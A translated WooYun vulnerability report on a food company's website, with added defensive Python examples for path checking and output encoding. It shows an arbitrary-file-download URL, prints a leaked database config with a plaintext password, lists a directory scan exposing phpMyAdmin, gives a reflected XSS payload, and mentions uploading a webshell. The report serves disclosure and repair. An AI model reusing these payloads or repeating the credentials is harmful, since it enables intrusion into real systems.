WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online browsing -------- http://drop.zone.ci/
2015-12-07: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-11: The vendor has confirmed; details are disclosed to the vendor only
2015-12-21: Details disclosed to core white hats and experts in the relevant field
2015-12-31: Details disclosed to ordinary white hats
2016-01-10: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public
Got hungry tonight; Copico chips still taste pretty good. So they are also made by Dali Group? Dali Group was born in Quanzhou, a famous historical and cultural city and East Asian Capital of Culture. Since its founding in 1989, through more than twenty years of rapid growth, Dali Group has become a comprehensive modern food enterprise group with revenue exceeding ten billion yuan and a place among China's top 500 private enterprises. Based on the characteristics of the industry, Dali Group has carefully laid out 18 subsidiaries across 16 provinces and regions of the country, with 30 food and beverage production bases, 1 potato flake production base and 1 packaging and colour printing company; at the same time the group has built sales channels renowned in the industry, forming a marketing network covering the whole country. Dali Group focuses on the food industry and has formed an industrial structure in which the two pillars, food and beverages, advance side by side. Through a large-platform, high-density, multi-dimensional brand promotion model it raises its brand image; its three major brands, "Daliyuan" pastries, "Haochidian" biscuits and "Copico" potato chips, have become recognised leading Chinese snack brands, while "Heqizheng" herbal tea, "Daliyuan" peanut milk and "Hi-Tiger" energy drink lead their respective categories. The multi-industry, multi-brand development strategy has made Dali Group an enterprise of very large scale and strength in both the food and beverage industries.
e.g. http://**.**.**.**/download.php?filename=download.php
<?php
define('IN_W3CWEB', true);
require(dirname(__FILE__) . '/include/global.php');

// $_GET['filename'] is appended to the site root with no validation at all,
// so any readable file under the web root can be requested by name
$filename = $config['siteRoot'] . $_GET['filename'];

// file download
// readfile
$fileinfo = pathinfo($filename);
header('Content-type: application/x-' . $fileinfo['extension']);
header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
header('Content-Length: ' . filesize($filename));
readfile($filename);
exit();
?>
Any source file under the website directory can be downloaded.
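As an added illustration (not code from the report or from the vendor's site), the following Python mirrors the check that download.php lacks: the user-supplied name is joined to a fixed download directory under the site root, resolved, required to stay inside that directory, and restricted to an allowlist of extensions. SITE_ROOT, DOWNLOAD_DIR and ALLOWED_EXTENSIONS are constructed placeholders; the PHP equivalent would be realpath() on the joined path plus a prefix comparison against realpath() of the download directory.

```python
import os
from pathlib import Path
from typing import Optional

# Constructed stand-in for $config['siteRoot'] (hypothetical path, need not exist)
SITE_ROOT = "/var/www/site"
# Hypothetical allowlist: only files below this subdirectory may be served
DOWNLOAD_DIR = "downloads"
# Hypothetical allowlist of extensions; source files (.php) are never served
ALLOWED_EXTENSIONS = {".pdf", ".zip", ".jpg", ".png"}


def resolve_download(filename: Optional[str], site_root: str = SITE_ROOT) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be refused.

    This is the validation download.php does not perform: the name is treated as
    relative to a fixed directory, resolved (so "..", "." and symlinks are
    collapsed), and then checked for containment before anything is read.
    """
    if not filename or "\x00" in filename:
        return None
    base = Path(site_root, DOWNLOAD_DIR).resolve()
    # A leading "/" would otherwise make the join discard `base` entirely
    # (this is how "/data/config.php" escaped in the original script), so the
    # name is always forced to be relative.
    candidate = (base / filename.lstrip("/\\")).resolve()
    # Containment check: the resolved path must be the base or a child of it.
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    if candidate.suffix.lower() not in ALLOWED_EXTENSIONS:
        return None
    return str(candidate)


if __name__ == "__main__":
    # Constructed requests: the report's two examples plus a legitimate one
    for name in ["brochure.pdf", "download.php", "/data/config.php", "../data/config.php"]:
        decision = resolve_download(name)
        print("%-22s -> %s" % (name, decision if decision else "REFUSED"))
```

Rejecting by extension is a second, independent layer: even a name that stays inside the download directory is refused if it is a script, which is the class of file the report shows being leaked.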
A directory scan turned up the following:
http://**.**.**.**:80/admin/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/images/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/old/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/include/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/admin/admin.php HTTP/1.1 200 OK
http://**.**.**.**:80/index.php HTTP/1.1 200 OK
http://**.**.**.**:80/phpmyadmin/index.php HTTP/1.1 200 OK
http://**.**.**.**:80/data/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/phpmyadmin/ HTTP/1.1 200 OK
http://**.**.**.**:80/phpmyadmin/db_create.php HTTP/1.1 200 OK
http://**.**.**.**:80/admin/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/ HTTP/1.1 200 OK
http://**.**.**.**:80/manage.php HTTP/1.1 200 OK
http://**.**.**.**:80/download.php HTTP/1.1 200 OK
http://**.**.**.**:80/data/ HTTP/1.1 403 Forbidden
http://**.**.**.**:80/include/ HTTP/1.1 403 Forbidden
phpMyAdmin is exposed. The database configuration was obtained through the source download: http://**.**.**.**/download.php?filename=/data/config.php
<?php
// database type
$db_type = "mysqli";
// database host
$db_host = "**.**.**.**";
// database name
$db_name = "daligroupcom";
// database username
$db_user = "daligroupcom";
// database password
$db_pass = 'cndaligroup123456';
$dsn1 = "$db_type://$db_user:$db_pass@$db_host/$db_name";
$timezone = "Asia/Chongqing";
$cookie_path = "/";
$cookie_domain = "";
$session = "1440";
$upload_pic_dir = "upload/temppic";
$html_dir = "html";
$data_dir = "data";
$if_html = 1;
$shtml_cache_time = "2";
$config['BASE_URL'] = "http://**.**.**.**/";
$config['adminpagename'] = "manage.php";
$config['now_time'] = time();
$config['cookie_pre'] = "benz_";
$config['cookie_path'] = "/";
$config['cookie_domain'] = "";
$config['siteRoot'] = substr(dirname(__file__), 0, -4);
$config['atturl'] = 'ATTACHMENT';
$config['attdir'] = $config['siteRoot'] . '/' . $config['atturl'];
$config['cacheurl'] = 'data/cache/';
$config['cachedir'] = $config['siteRoot'] . '/' . $config['cacheurl'];
// table prefix
$prefix = "w3c_";
$table_admin = $prefix . "admin";
$table_ads = $prefix . "ads";
$table_ads_position = $prefix . "ads_position";
$table_article = $prefix . "article";
$table_articles = $prefix . "articles";
$table_config = $prefix . "config";
$table_category = $prefix . "category";
$table_goods = $prefix . "goods";
$table_goods_result = $prefix . "goods_result";
$table_goods_tracelog = $prefix . "goods_tracelog";
$table_icate = $prefix . "icate";
$table_join = $prefix . "join";
$table_job = $prefix . "job";
//$_G['global']['sex']=array("M"=>"男","W"=>"女");
$_G['global']['JobLng'] = array("cn" => "中文", "en" => "英文");
//question
$_G['global']['article_channel'] = array("0" => "无", "1" => "首页", "2" => "二级频道");
$_G['global']['article_showstyle'] = array("0" => "列表", "1" => "轮播图", "2" => "红标题", "3" => "单独图片", "4" => "图片/标题", "5" => "图片/标题/简介", "6" => "图片/简介");
?>
Connected to the database.
Upload a webshell and the homepage could be modified!
XSS
http://**.**.**.**/activity.php?artid=&cid=44%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/xss/)%3C/ScRiPt%3E
There are several XSS points; developers are advised to filter and encode parameters of this kind before they are reflected.
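An added example, not code from the report or the vendor's site, of the two-layer handling a parameter like cid should get: strict allowlist validation (a category id is a positive integer) and entity encoding of anything that is nonetheless reflected into HTML. The function names and the heading markup are assumptions; the sample input is the URL-decoded cid value from the report's URL.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote

# The cid value from the report's URL, decoded here as a constructed sample input
REPORTED_CID = unquote("44%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/xss/)%3C/ScRiPt%3E")


def parse_cid(raw: Optional[str]) -> Optional[int]:
    """Allowlist validation: a category id is a positive integer of at most 10 digits.

    Anything else is rejected outright rather than "cleaned", so the handler never
    builds a query or a page around an attacker-shaped value.
    """
    if raw is None or re.fullmatch(r"[1-9][0-9]{0,9}", raw) is None:
        return None
    return int(raw)


def render_category_heading(raw_cid: Optional[str]) -> str:
    """Build the heading activity.php would print for a category (hypothetical markup).

    When validation fails, the value is still shown to the user, but only after
    html.escape() with quote=True, which encodes & < > " and ' so the string is
    inert both in HTML text and inside a quoted attribute.
    """
    cid = parse_cid(raw_cid)
    if cid is None:
        shown = html.escape(raw_cid or "", quote=True)
        return '<h2 class="error">Unknown category: %s</h2>' % shown
    return "<h2>Category %d</h2>" % cid


if __name__ == "__main__":
    print(render_category_heading("44"))
    print(render_category_heading(REPORTED_CID))
```

Validation is what stops the bad value from reaching the database or a redirect; encoding at the output point is what keeps it harmless if it is ever echoed, and the two are applied independently so a gap in one does not reopen the other.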
WooYun's Baidu weight is 5 and Dali Group's weight is 4 as well, so it gets quite a few visitors. Good-tasting food is a must, and security has to keep up too! Asking for a high rank, or a Jay Chou autograph~
Fix: the download.php source, handle it as you see fit. XSS filtering.
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-12-11 18:10
CNVD confirmed the described vulnerability; no direct handling channel with the website's administering organisation has been established yet; pending claim.
None yet